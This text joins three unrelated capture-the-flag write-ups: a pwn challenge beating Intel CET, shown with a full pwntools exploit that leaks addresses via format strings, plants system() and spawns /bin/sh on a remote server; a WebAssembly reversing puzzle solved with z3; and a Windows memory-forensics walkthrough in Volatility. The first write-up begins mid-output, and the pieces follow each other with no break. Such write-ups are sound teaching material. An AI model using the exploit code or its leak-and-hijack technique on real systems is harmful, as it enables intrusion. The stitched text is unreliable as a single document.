=> swing 0x0000555555555287 => lob 0x00005555555552bc => taunt 0x0000555555555321 => hear_taunt``` now let's decompile them ```cint swing(void) { puts("You make a rough swing at your opponent"); printf("%p\n",banter); return 0;} int lob(void) { puts("Alley-oop!"); banter = banter << 8; return 0;} int taunt(char *string) { int num; char *local_banter; local_banter = string; if (*string == '\0') { local_banter = "<INSERT BANTER HERE>"; } printf("You say to your opponent: \'%s\'\n",local_banter); num = atoi(local_banter); banter = banter | (long)num; return 0;} void hear_taunt(void) { ... puts("Your opponent taunts \"You can\'t reach me!\""); argv = "/bin/sh"; argv_1 = 0; execve("/bin/sh",&argv,(char **)0x0); ...}``` oh wait . we got a function that does `execve("/bin/sh",...)` .. woah , let's see if it works ![gif_getting_local_shell](https://raw.githubusercontent.com/S4muii/ctf_writeups/main/wolvctf24/game_cet/assets/gif_getting_local_shell.gif) well, That was unexpected, as you can see it does work . easiest challenge ever . let's goooooo. until you try it on remote and realize the `CET` in the name of the challenge. quick google search gave me this one-liner to check since checksec didn't give us this info . although it sometimes does depending on the version you have. ```shell readelf -n ./chal_patched| grep -a SHSTK Properties: x86 feature: IBT, SHSTK``` ### Intel CETto those who don't know `Intel CET` is the hotest trend in preventing `ROP/JOP` and it is the thing that will make our lives as pwners a lot more difficult in the future . It's intel implementation of the `CFI` "Control Flow Integrity" technology . in a nutshell they're trying to prevent unauthorized jumps that the application wasn't trying to make on it's own . it's got multiple different techniques. * `SHSTK` "Shadow Stack" which mimics the original stack so we got two duplicates of `saved RIP` when we do a `Call` instruction of it's application so when you try to do a `RET` for example . it will check the value in the "Shadow Stack" and compare it to the one in the program stack which we as attacker might have clobbered it using a stack buffer overflow or something else for the same effect . if it detects a mismatch it stop execution of the program and output an error message. * `IBT` "Indirect branch tracking" are mainly implemented in `ENDBR` instructions . you probably have seen them these days a lot . because compilers started inserting them at every function call since a few years ago when the `CET` started to take off . they mean "END BRANCH" . and without going into too much details . the CPU have a state machine that will keep track of the program state . whenever you do a call or indirect jump then the cpu will set that state to something and once the CPU takes that jump or call it assumes the first instruction it will hit is either `ENDBR32` or `ENDBR64` or else it abort execution and output an error message. and because `ROP` relies on us jumping in the middle of the program or sometimes in the middle of an instruction then this effectively eliminates most of our `ROP gadgets` . only gadgets that are acceptable are the ones that start with the end branch instruction which you won't find as common . if you ever find one. for more information about `CET` there's better resources out there especially this [intel article](https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html) there's an emulator that we can use to test this .intel sde .. you can download it from [here](https://www.intel.com/content/www/us/en/download/684897/intel-software-development-emulator.html) . and read more about the arguments that you can use with it [here](https://www.intel.com/content/www/us/en/developer/articles/technical/emulating-applications-with-intel-sde-and-control-flow-enforcement-technology.html) I've saved you the trouble of finding out which switches you can use to simulate the same env as remote `sde64 -future -cet -cet-stderr -cet-endbr-exe -- ./chal_patched` For this challenge we don't have to deal with the shadow stack since we're not gonna modify the `saved RIP`s on the stack and we don't need to `ROP`. Luckily for us we got a vtable that we can modify somehow and exploit so that leaves us with the `ENDBR64` . there's no `ENDBR64` instruction in that function `hear_taunt` so basically we can't just call it and profit . now we need to do something else. recall from the beginning we can call any function pointers relative to the binary image . which means we got to call any functions in the `GOT` . we got `execve` in the GOT bcs of the `hear_taunt` soooooooo . you might have guessed it . we can try to call execve and see what will happen. ![gif_trying_execve](https://raw.githubusercontent.com/S4muii/ctf_writeups/main/wolvctf24/game_cet/assets/gif_trying_execve.gif) well . this was an epic fail right! . we have control over the first argument to the function given that it's a pointer . we can put arbitiry data that goes up to `0xf0` bytes . but we don't have control over the `$RSI` . we'll have to do with whatever that was left in it . that's okay we can leave that for later . the main worry is about `$RDX` . look at this . that's the part that calls the vtable[option]. ```as LAB_00101518 XREF[1]: 00101508(j) 00101518 8b 85 dc MOV EAX,dword ptr [RBP + local_12c] fe ff ff 0010151e 83 e8 01 SUB EAX,0x1 00101521 48 98 CDQE 00101523 48 8d 14 LEA RDX,[RAX*0x8] c5 00 00 00 00 0010152b 48 8d 05 LEA RAX,[ptrs] ee 2a 00 00 00101532 48 8b 14 02 MOV RDX,qword ptr [RDX + RAX*0x1]=>ptrs 00101536 48 8b 85 MOV RAX,qword ptr [RBP + arg] e0 fe ff ff 0010153d 48 89 c7 MOV RDI,RAX 00101540 ff d2 CALL RDX``` Looks like the `$RDX` will always have a pointer to the the function we're calling . which in this case gonna be `execve` . and is not gonna be compatible with the `envp` . recall that `envp` is an array of char*. but I still didn't get it! . after a bit of experimentation using a toy example of creating envp/argv and using them . I came to the conclusion that `$RDX` will never work . we needed control over `$RDX` either to set it properly to an array of strings that end with a `NULL` or to be `NULL` itself . and we can't do either. but not all hope is lost . ### Recapwe can call any function of the `GOT` and we have control over `$RDI` if the target function needs a pointer and that's about all the control we have here . a very obvious target would be `system("/bin/sh");` . but we need to leak libc and put that system function pointer somewhere relative to the binary image . that's where the functionality of `swing/lob/taunt` come into play . they can modify the `banter` global variable which in a constant offset from our vtable `ptrs`. so now all that's left is the libc leak . we have printf in the GOT so we can use that with a controlled `$RDI` to leak the stack and find out where the libc addresses are . usually with `ASLR` and `PIE` enabled we can assume the following * libs addresses will start `0x7f` .* binary addersses will start at `0x5?` .* addresses will be 6 bytes . Those are not a requirement . but it's the usual behavior of the loader and the Linux kernel's memory management subsystem. We can't leak libc blindly but we can leak binary addresses blindly though since the binary image is small enough we can guess the binary image base without too much of a hassle. ### Game Plan + leak binary base. + leak GOT values. + use the [Libc Databse Search](https://libc.blukat.me/) to find out which libc was used.+ place system function pointer from libc into `banter`.+ profit ### ExploitSince I already done that stuff manually I herby present you with the final exploit with the correct libc used on remote. ```py from pwn import *context.log_level = 'INFO' if args.REMOTE: p = remote('45.76.30.75',1337)else: p = process('./chal_patched',env={},stdout=process.PTY, stdin=process.PTY) # gdb.attach(p,gdbscript= 'b printf') elf = ELF('./chal_patched',checksec=False)libc = ELF('./lib/libc.so.6',checksec=False) printf_off = ((elf.got.printf - elf.symbols.ptrs)// 8)+1banter_off = ((elf.symbols.banter - elf.symbols.ptrs)// 8)+1 s2p = lambda x : u64(x.ljust(8,b'\0')) def leak_address(off): payload = str(printf_off).encode() payload+= b' ' payload+= f'%{off}$p'.encode() p.sendlineafter(b'> ',payload) p.recvuntil(f'You selected {printf_off}\n'.encode()) leak = p.recvuntil(b'Select an option')[:-len(b'Select an option')] return leak def leak_string(addr): # offset between where the $RSP - the address we place on the stack when calling printf off = ((0x00007fffffffdc80 - 0x7fffffffdc38)// 8)+5 payload = str(printf_off).encode() payload+= b'A'*5 payload+= f'%{off}$s\n'.encode().ljust(8,b'A') payload+= p64(addr) p.sendlineafter(b'>',payload) p.recvuntil(f'You selected {printf_off}\n'.encode()) p.recvuntil(b'AAAA') leak = p.recvline()[:-1] return leak # bruteforced after a few tries to find a valid binary address on remotemain_leak_off = ((0x00007fffffffdd98 - 0x7fffffffdc38)//8 + 5)-10 main = (int(leak_address(main_leak_off),base=16)&(~0xfff))+0x1000*-1 elf.address = mainlog.success(f"bin_base: 0x{elf.address:012x}") log.info(f"\tprintf: 0x{s2p(leak_string(elf.got.printf)):012x} ") # 0x7fe5ce422c90log.info(f"\tputs: 0x{s2p(leak_string(elf.got.puts)):012x} " ) # 0x7fe5ce445420log.info(f"\tread: 0x{s2p(leak_string(elf.got.read)):012x} " ) # 0x7fe5ce4cf1e0 libc.address = s2p(leak_string(elf.got.puts)) - libc.symbols["_IO_puts"]log.success(f"libc_base: 0x{libc.address:012x}") for i in range(5,-1,-1): x = ((libc.symbols.system & (0xff <<i*8) ) >> (i*8)) p.sendlineafter(b'> ',f'3 {x}'.encode()) # [taunt] to set the least significat byte on banter if i!=0: p.sendlineafter(b'> ',b'2') # [lob] to left shift it by 8 bits payload = str(banter_off).encode()payload+= b' 'payload+= f'/bin/sh\0'.encode() p.sendlineafter(b'> ',payload)p.success('popping a shell')p.clean()p.interactive() # wctf{y0u_c4nt_b3_s3r1ous_appr0ved_g4dg3t5_0nly}``` ![congratz](https://raw.githubusercontent.com/S4muii/ctf_writeups/main/wolvctf24/game_cet/assets/congratz.gif)
From the html source, we can know `cs` has the form of `[a-z]{12}`. The key space expanding to ${26}^{12}$ which makes bruteforce impossible. We fetch the `checker.wasm` and decompile it with some traditional approaches:```shwget https://github.com/WebAssembly/wabt/releases/download/{version}/wabt-{version}-{platform}.tar.gztar zxvf wabt-{version}-{platform}.tar.gzcd wabt-{version}cp /PATH/TO/checker.wasm .bin/wasm2c checker.wasm -o checker.ccp wasm-rt-impl.c wasm-rt-impl.h wasm-rt.h```Then you can decompile it using `IDA(Pro)`:```c__int64 __fastcall w2c_checker_checker_0(unsigned int *a1, unsigned int a2, unsigned int a3){ unsigned int v5; // [rsp+18h] [rbp-118h] unsigned int v6; // [rsp+1Ch] [rbp-114h] unsigned int v7; // [rsp+1Ch] [rbp-114h] unsigned int v8; // [rsp+20h] [rbp-110h] unsigned int v9; // [rsp+20h] [rbp-110h] unsigned int v10; // [rsp+24h] [rbp-10Ch] unsigned int v11; // [rsp+24h] [rbp-10Ch] unsigned int v12; // [rsp+58h] [rbp-D8h] unsigned int v13; // [rsp+74h] [rbp-BCh] unsigned int v14; // [rsp+78h] [rbp-B8h] unsigned int v15; // [rsp+A0h] [rbp-90h] char v16; // [rsp+C4h] [rbp-6Ch] unsigned int v17; // [rsp+C8h] [rbp-68h] int v18; // [rsp+D0h] [rbp-60h] unsigned int v19; // [rsp+E4h] [rbp-4Ch] unsigned int v20; // [rsp+F4h] [rbp-3Ch] unsigned int v21; // [rsp+118h] [rbp-18h] unsigned int v22; // [rsp+120h] [rbp-10h] char v23; // [rsp+12Ch] [rbp-4h] v22 = *a1 - 32; *a1 = v22; i32_store(a1 + 4, v22 + 28LL, a2); i32_store(a1 + 4, v22 + 24LL, a3); v21 = i32_load(a1 + 4, v22 + 24LL); i32_store(a1 + 4, v22 + 20LL, v22); v20 = v22 - ((4 * v21 + 15) & 0xFFFFFFF0); *a1 = v20; i32_store(a1 + 4, v22 + 16LL, v21); i32_store(a1 + 4, v22 + 12LL, 0LL); while ( 1 ) { v19 = i32_load(a1 + 4, v22 + 12LL); if ( v19 >= (unsigned int)i32_load(a1 + 4, v22 + 24LL) ) break; v18 = i32_load(a1 + 4, v22 + 28LL); v17 = i32_load(a1 + 4, v22 + 12LL) + v18; v16 = i32_load8_u(a1 + 4, v17); v15 = 4 * i32_load(a1 + 4, v22 + 12LL) + v20; i32_store(a1 + 4, v15, (unsigned int)(v16 - 97)); v10 = i32_load(a1 + 4, v22 + 12LL) + 1; i32_store(a1 + 4, v22 + 12LL, v10); } v23 = 0; if ( !(unsigned int)i32_load(a1 + 4, v20 + 4LL) ) { v23 = 0; if ( !(unsigned int)i32_load(a1 + 4, v20 + 32LL) ) { v23 = 0; if ( !(unsigned int)i32_load(a1 + 4, v20 + 44LL) ) { v14 = i32_load(a1 + 4, v20); v13 = i32_load(a1 + 4, v20 + 8LL); v8 = i32_load(a1 + 4, v20 + 12LL); v6 = i32_load(a1 + 4, v20 + 16LL); v23 = 0; if ( (w2c_checker_f1(a1, v14, v13, v8, v6) & 1) != 0 ) { v12 = i32_load(a1 + 4, v20 + 20LL); v11 = i32_load(a1 + 4, v20 + 24LL); v9 = i32_load(a1 + 4, v20 + 28LL); v7 = i32_load(a1 + 4, v20 + 36LL); v5 = i32_load(a1 + 4, v20 + 40LL); v23 = w2c_checker_f2(a1, v12, v11, v9, v7, v5); } } } } i32_load(a1 + 4, v22 + 20LL); *a1 = v22 + 32; return v23 & 1;}_BOOL8 __fastcall w2c_checker_f1(_DWORD *a1, unsigned int a2, unsigned int a3, unsigned int a4, unsigned int a5){ int v9; // [rsp+44h] [rbp-94h] int v10; // [rsp+4Ch] [rbp-8Ch] int v11; // [rsp+54h] [rbp-84h] int v12; // [rsp+7Ch] [rbp-5Ch] int v13; // [rsp+A4h] [rbp-34h] unsigned int v14; // [rsp+C8h] [rbp-10h] bool v15; // [rsp+D4h] [rbp-4h] v14 = *a1 - 16; i32_store(a1 + 4, v14 + 12LL, a2); i32_store(a1 + 4, v14 + 8LL, a3); i32_store(a1 + 4, v14 + 4LL, a4); i32_store(a1 + 4, v14, a5); v15 = 0; if ( (unsigned int)i32_load(a1 + 4, v14 + 12LL) == 22 ) { v13 = i32_load(a1 + 4, v14 + 8LL); v15 = 0; if ( (unsigned int)i32_load(a1 + 4, v14 + 4LL) + v13 == 30 ) { v12 = i32_load(a1 + 4, v14 + 4LL); v15 = 0; if ( (unsigned int)i32_load(a1 + 4, v14) * v12 == 168 ) { v11 = i32_load(a1 + 4, v14 + 12LL); v10 = i32_load(a1 + 4, v14 + 8LL) + v11; v9 = i32_load(a1 + 4, v14 + 4LL) + v10; return (unsigned int)i32_load(a1 + 4, v14) + v9 == 66; } } } return v15;}_BOOL8 __fastcall w2c_checker_f2( _DWORD *a1, unsigned int a2, unsigned int a3, unsigned int a4, unsigned int a5, unsigned int a6){ int v11; // [rsp+4Ch] [rbp-154h] int v12; // [rsp+74h] [rbp-12Ch] int v13; // [rsp+9Ch] [rbp-104h] int v14; // [rsp+C8h] [rbp-D8h] int v15; // [rsp+CCh] [rbp-D4h] int v16; // [rsp+D4h] [rbp-CCh] int v17; // [rsp+100h] [rbp-A0h] int v18; // [rsp+104h] [rbp-9Ch] int v19; // [rsp+10Ch] [rbp-94h] int v20; // [rsp+134h] [rbp-6Ch] int v21; // [rsp+13Ch] [rbp-64h] int v22; // [rsp+144h] [rbp-5Ch] int v23; // [rsp+14Ch] [rbp-54h] int v24; // [rsp+174h] [rbp-2Ch] int v25; // [rsp+17Ch] [rbp-24h] int v26; // [rsp+184h] [rbp-1Ch] int v27; // [rsp+18Ch] [rbp-14h] unsigned int v28; // [rsp+190h] [rbp-10h] bool v29; // [rsp+19Ch] [rbp-4h] v28 = *a1 - 32; i32_store(a1 + 4, v28 + 28LL, a2); i32_store(a1 + 4, v28 + 24LL, a3); i32_store(a1 + 4, v28 + 20LL, a4); i32_store(a1 + 4, v28 + 16LL, a5); i32_store(a1 + 4, v28 + 12LL, a6); v27 = i32_load(a1 + 4, v28 + 28LL); v26 = i32_load(a1 + 4, v28 + 24LL) + v27; v25 = i32_load(a1 + 4, v28 + 20LL) + v26; v24 = i32_load(a1 + 4, v28 + 16LL) + v25; v29 = 0; if ( (unsigned int)i32_load(a1 + 4, v28 + 12LL) + v24 == 71 ) { v23 = i32_load(a1 + 4, v28 + 28LL); v22 = i32_load(a1 + 4, v28 + 24LL) * v23; v21 = i32_load(a1 + 4, v28 + 20LL) * v22; v20 = i32_load(a1 + 4, v28 + 16LL) * v21; v29 = 0; if ( (unsigned int)i32_load(a1 + 4, v28 + 12LL) * v20 == 449280 ) { v19 = i32_load(a1 + 4, v28 + 28LL); v18 = i32_load(a1 + 4, v28 + 28LL) * v19; v17 = i32_load(a1 + 4, v28 + 24LL); v29 = 0; if ( (unsigned int)i32_load(a1 + 4, v28 + 24LL) * v17 + v18 == 724 ) { v16 = i32_load(a1 + 4, v28 + 20LL); v15 = i32_load(a1 + 4, v28 + 20LL) * v16; v14 = i32_load(a1 + 4, v28 + 16LL); v29 = 0; if ( (unsigned int)i32_load(a1 + 4, v28 + 16LL) * v14 + v15 == 313 ) { v13 = i32_load(a1 + 4, v28 + 12LL); v29 = 0; if ( (unsigned int)i32_load(a1 + 4, v28 + 12LL) * v13 == 64 ) { v12 = i32_load(a1 + 4, v28 + 28LL); v29 = 0; if ( (unsigned int)i32_load(a1 + 4, v28 + 20LL) + v12 == 30 ) { v11 = i32_load(a1 + 4, v28 + 28LL); return v11 - (unsigned int)i32_load(a1 + 4, v28 + 16LL) == 5; } } } } } } return v29;}```***Or***, if you have `JEB Decompiler`:```cint checker(int param0, int param1) { int* ptr0 = __g0 - 8; __g0 -= 8; *(ptr0 + 7) = param0; *(ptr0 + 6) = param1; int v0 = *(ptr0 + 6); *(ptr0 + 5) = ptr0; int* ptr1 = (int*)((int)ptr0 - ((v0 * 4 + 15) & 0xfffffff0)); __g0 = (int)ptr0 - ((v0 * 4 + 15) & 0xfffffff0); *(ptr0 + 4) = v0; *(ptr0 + 3) = 0; while((unsigned int)*(ptr0 + 3) < (unsigned int)*(ptr0 + 6)) { *(int*)(*(ptr0 + 3) * 4 + (int)ptr1) = (int)*(char*)(*(ptr0 + 3) + *(ptr0 + 7)) - 97; ++*(ptr0 + 3); } int v1 = 0; if(!*(ptr1 + 1)) { v1 = 0; if(!*(ptr1 + 8)) { v1 = 0; if(!*(ptr1 + 11)) { int v2 = __f1(*(ptr1 + 4), *(ptr1 + 3), *(ptr1 + 2), *ptr1); v1 = 0; if((v2 & 0x1) != 0) { v1 = __f2(*(ptr1 + 10), *(ptr1 + 9), *(ptr1 + 7), *(ptr1 + 6), *(ptr1 + 5)); } } } } __g0 = ptr0 + 8; return v1 & 0x1;}int __f1(int param0, int param1, int param2, int param3) { int* ptr0 = __g0 - 4; *(ptr0 + 3) = param0; *(ptr0 + 2) = param1; *(ptr0 + 1) = param2; *ptr0 = param3; int v0 = 0; if(*(ptr0 + 3) == 22) { v0 = 0; if(*(ptr0 + 1) + *(ptr0 + 2) == 30) { v0 = 0; if(*(ptr0 + 1) * *ptr0 == 168) { v0 = (unsigned int)(*(ptr0 + 1) + *(ptr0 + 2) + (*(ptr0 + 3) + *ptr0) == 66); } } } return v0 & 0x1;}int __f2(int param0, int param1, int param2, int param3, int param4) { int* ptr0 = __g0 - 8; *(ptr0 + 7) = param0; *(ptr0 + 6) = param1; *(ptr0 + 5) = param2; *(ptr0 + 4) = param3; *(ptr0 + 3) = param4; int v0 = 0; if(*(ptr0 + 3) + *(ptr0 + 4) + (*(ptr0 + 5) + *(ptr0 + 6)) + *(ptr0 + 7) == 71) { v0 = 0; if(*(ptr0 + 3) * *(ptr0 + 4) * (*(ptr0 + 5) * *(ptr0 + 6)) * *(ptr0 + 7) == 0x6db00) { v0 = 0; if(*(ptr0 + 6) * *(ptr0 + 6) + *(ptr0 + 7) * *(ptr0 + 7) == 724) { v0 = 0; if(*(ptr0 + 4) * *(ptr0 + 4) + *(ptr0 + 5) * *(ptr0 + 5) == 313) { v0 = 0; if(*(ptr0 + 3) * *(ptr0 + 3) == 64) { v0 = 0; if(*(ptr0 + 5) + *(ptr0 + 7) == 30) { v0 = (unsigned int)(*(ptr0 + 7) - *(ptr0 + 4) == 5); } } } } } } return v0 & 0x1;}```which seems more readable. However, if you compare the two codes, you will noticed that they pass arguments in the opposite order(Similar reports in [a writeup](https://ctftime.org/writeup/36277#:~:text=For%20some%20reason%2C%20in%20ReWasm%2C%20parameters%20appear%20in%20the%20reverse%20order%3A)).By trying the both, it turned out that `IDA` was correct. The constrains can then be simplified to this solve script:```pyfrom z3 import * x = [Int(f"x_{i}") for i in range(12)]c = [i - 97 for i in x]s = Solver()s.add( 0 == c[1], 0 == c[8], 0 == c[11], c[0] == 22, c[3] + c[2] == 30, c[3] * c[4] == 168, c[3] + c[2] + c[0] + c[4] == 66, c[10] + c[9] + (c[7] + c[6]) + c[5] == 71, c[10] * c[9] * (c[7] * c[6]) * c[5] == 449280, c[6] * c[6] + c[5] * c[5] == 724, c[9] * c[9] + c[7] * c[7] == 313, c[10] * c[10] == 64, c[7] + c[5] == 30, c[5] - c[9] == 5,)s.check()m = s.model()x = [m[i].as_long() for i in x]print(bytes(x)) # osu{wasmosumania}```
# Eternally Pwned: Persistence > Author: dree_ > Description: I get that the attackers were in my PC, but how did they achieve persistence? [MEMORY.DMP](https://drive.usercontent.google.com/download?id=19kx1J7rTkck3EswVd42ZiQUr2sBo-s2J&export=download) The next forensics challenge is `Persistence`, that we have to investigate the dump of memory unknown profile So we can use `strings` or another method to determine some profile informations like trying this examples: > `$ strings MEMORY.DMP | grep "notepad"`> > `$ strings MEMORY.DMP | grep "microsoft"`> > `$ strings MEMORY.DMP | grep "windows"` (a bit ridiculous, but helpful ?) Note that we have already know this is a dump of windows, so we can retrieve the information of it with `Volatility 3` ```bash {title="windows.info"}$ volatility3 -f MEMORY.DMP windows.infoVolatility 3 Framework 2.5.0Progress: 100.00 PDB scanning finishedVariable Value Kernel Base 0xf80001852000DTB 0x187000Symbols file:///home/nopedawn/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3844DBB920174967BE7AA4A2C20430FA-2.json.xzIs64Bit TrueIsPAE Falselayer_name 0 WindowsIntel32ememory_layer 1 WindowsCrashDump64Layerbase_layer 2 FileLayerKdDebuggerDataBlock 0xf80001a430a0NTBuildLab 7601.17514.amd64fre.win7sp1_rtm.CSDVersion 1KdVersionBlock 0xf80001a43068Major/Minor 15.7601MachineType 34404KeNumberProcessors 1SystemTime 2024-03-09 12:05:40NtSystemRoot C:\WindowsNtProductType NtProductServerNtMajorVersion 6NtMinorVersion 1PE MajorOperatingSystemVersion 6PE MinorOperatingSystemVersion 1PE Machine 34404PE TimeDateStamp Sat Nov 20 09:30:02 2010``` See! It's a dump of windows, now we can retrieve the information of process are running ```bash {title="windows.pstree"}$ volatility3 -f MEMORY.DMP windows.pstreeVolatility 3 Framework 2.5.0Progress: 100.00 PDB scanning finishedPID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime 4 0 System 0xfa8018d8db30 71 497 N/A False 2024-03-09 11:47:48.000000 N/A* 224 4 smss.exe 0xfa8019c06310 2 29 N/A False 2024-03-09 11:47:48.000000 N/A296 288 csrss.exe 0xfa801a39a750 9 341 0 False 2024-03-09 11:47:49.000000 N/A348 288 wininit.exe 0xfa801a3b8b30 4 77 0 False 2024-03-09 11:47:49.000000 N/A* 468 348 lsm.exe 0xfa801a40eb30 11 144 0 False 2024-03-09 11:47:49.000000 N/A* 460 348 lsass.exe 0xfa801a4083b0 8 569 0 False 2024-03-09 11:47:49.000000 N/A* 444 348 services.exe 0xfa801a3ff5f0 9 200 0 False 2024-03-09 11:47:49.000000 N/A** 640 444 svchost.exe 0xfa801a54bb30 9 243 0 False 2024-03-09 11:47:50.000000 N/A** 1536 444 spoolsv.exe 0xfa801a93fb30 13 254 0 False 2024-03-09 11:56:05.000000 N/A** 908 444 svchost.exe 0xfa801a5ccb30 8 197 0 False 2024-03-09 11:47:50.000000 N/A*** 1304 908 dwm.exe 0xfa801a75a060 4 66 1 False 2024-03-09 11:47:51.000000 N/A** 1040 444 svchost.exe 0xfa801a6d0060 4 46 0 False 2024-03-09 11:47:51.000000 N/A** 2040 444 mscorsvw.exe 0xfa801a85db30 8 84 0 True 2024-03-09 11:49:52.000000 N/A** 1956 444 sppsvc.exe 0xfa801a87f4f0 5 151 0 False 2024-03-09 11:47:59.000000 N/A** 812 444 svchost.exe 0xfa801a5a49e0 34 953 0 False 2024-03-09 11:47:50.000000 N/A** 1200 444 taskhost.exe 0xfa801a722b30 6 117 1 False 2024-03-09 11:47:51.000000 N/A** 692 444 svchost.exe 0xfa801a5645f0 14 288 0 False 2024-03-09 11:47:50.000000 N/A** 948 444 svchost.exe 0xfa801a5dc5f0 17 441 0 False 2024-03-09 11:47:50.000000 N/A** 1332 444 mscorsvw.exe 0xfa801a705060 8 75 0 False 2024-03-09 11:49:52.000000 N/A** 312 444 spoolsv.exe 0xfa801a6a6670 0 - 0 False 2024-03-09 11:47:51.000000 2024-03-09 11:55:05.000000** 1852 444 msdtc.exe 0xfa8018e3e620 13 142 0 False 2024-03-09 11:49:53.000000 N/A** 576 444 svchost.exe 0xfa801a521b30 12 348 0 False 2024-03-09 11:47:50.000000 N/A*** 1848 576 WmiPrvSE.exe 0xfa801a500a10 7 118 0 False 2024-03-09 12:04:55.000000 N/A*** 2052 576 WmiPrvSE.exe 0xfa801990fb30 9 248 0 False 2024-03-09 12:04:56.000000 N/A** 1992 444 svchost.exe 0xfa801a46c220 6 67 0 False 2024-03-09 11:49:53.000000 N/A** 860 444 svchost.exe 0xfa801a5c05a0 11 273 0 False 2024-03-09 11:47:50.000000 N/A** 1380 444 svchost.exe 0xfa801a78e730 6 99 0 False 2024-03-09 11:47:52.000000 N/A** 240 444 svchost.exe 0xfa801a41d060 18 295 0 False 2024-03-09 11:47:50.000000 N/A** 2168 444 TrustedInstall 0xfa801a4fab30 7 223 0 False 2024-03-09 12:04:57.000000 N/A360 340 csrss.exe 0xfa801a3bf060 7 266 1 False 2024-03-09 11:47:49.000000 N/A* 988 360 conhost.exe 0xfa801a85e1d0 2 38 1 False 2024-03-09 11:49:15.000000 N/A* 1868 360 conhost.exe 0xfa801a4a8630 2 38 1 False 2024-03-09 11:50:05.000000 N/A408 340 winlogon.exe 0xfa801a3f75c0 4 97 1 False 2024-03-09 11:47:49.000000 N/A1320 1292 explorer.exe 0xfa801a7637c0 30 712 1 False 2024-03-09 11:47:52.000000 N/A* 896 1320 multireader.ex 0xfa801a8601d0 2 57 1 False 2024-03-09 11:54:50.000000 N/A* 804 1320 cmd.exe 0xfa801a496450 1 21 1 False 2024-03-09 11:50:05.000000 N/A* 1644 1320 notepad.exe 0xfa801a4ba060 1 57 1 False 2024-03-09 11:52:04.000000 N/A* 1804 1320 cGFzdGViaW4uY2 0xfa801a8de800 8 258 1 False 2024-03-09 11:54:49.000000 N/A* 1680 1320 cmd.exe 0xfa801a862060 1 19 1 False 2024-03-09 11:49:15.000000 N/A* 1272 1320 iexplore.exe 0xfa801a983b30 11 381 1 True 2024-03-09 11:55:44.000000 N/A** 1284 1272 iexplore.exe 0xfa801a503b30 16 348 1 True 2024-03-09 11:55:45.000000 N/A2568 2492 taskmgr.exe 0xfa801ac2db30 7 124 1 False 2024-03-09 12:05:33.000000 N/A``` I see there is a strange process running on `PID: 1804`, look like base64 `cGFzdGViaW4uY2` ```bash$ echo "cGFzdGViaW4uY2" | base64 -dpastebin.c``` Hmm, A pastebin running on windows? What about the command-line dump history? ```bash$ volatility3 -f MEMORY.DMP windows.cmdlineVolatility 3 Framework 2.5.0Progress: 100.00 PDB scanning finishedPID Process Args 4 System Required memory at 0x20 is not valid (process exited?)224 smss.exe \SystemRoot\System32\smss.exe296 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16348 wininit.exe wininit.exe360 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16408 winlogon.exe winlogon.exe444 services.exe C:\Windows\system32\services.exe460 lsass.exe C:\Windows\system32\lsass.exe468 lsm.exe C:\Windows\system32\lsm.exe576 svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch640 svchost.exe C:\Windows\system32\svchost.exe -k RPCSS692 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted812 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs860 svchost.exe C:\Windows\system32\svchost.exe -k LocalService908 svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted948 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService240 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork312 spoolsv.exe Required memory at 0x7fffffdf020 is not valid (process exited?)1040 svchost.exe C:\Windows\system32\svchost.exe -k regsvc1200 taskhost.exe "taskhost.exe"1304 dwm.exe "C:\Windows\system32\Dwm.exe"1320 explorer.exe C:\Windows\Explorer.EXE1380 svchost.exe C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1956 sppsvc.exe C:\Windows\system32\sppsvc.exe1680 cmd.exe "C:\Windows\system32\cmd.exe"988 conhost.exe \??\C:\Windows\system32\conhost.exe2040 mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe1332 mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe1992 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation1852 msdtc.exe C:\Windows\System32\msdtc.exe804 cmd.exe "C:\Windows\system32\cmd.exe"1868 conhost.exe \??\C:\Windows\system32\conhost.exe1644 notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\joe\Desktop\schedule.txt1804 cGFzdGViaW4uY2 "C:\temp\cGFzdGViaW4uY29tL3lBYTFhS2l1.exe"896 multireader.ex "C:\temp\multireader.exe"1272 iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"1284 iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1272 CREDAT:719371536 spoolsv.exe C:\Windows\System32\spoolsv.exe1848 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe2052 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe2168 TrustedInstall C:\Windows\servicing\TrustedInstaller.exe2568 taskmgr.exe "C:\Windows\system32\taskmgr.exe" /1``` Look athe process running `cGFzdGViaW4uY29tL3lBYTFhS2l1.exe`, decode it `cGFzdGViaW4uY29tL3lBYTFhS2l1` ```bash$ echo "cGFzdGViaW4uY29tL3lBYTFhS2l1" | base64 -dpastebin.com/yAa1aKiu``` That's a pastebin link [https://pastebin.com/yAa1aKiu](https://pastebin.com/yAa1aKiu), and there's a flag on it ![pastebin-flag.png](https://raw.githubusercontent.com/nopedawn/CTF/main/WolvCTF24/Infiltration/pastebin-flag.png) > Flag: `wctf{v0lAt1l3_m3m0ry_4qu1r3D_a3fe9fn3al}`
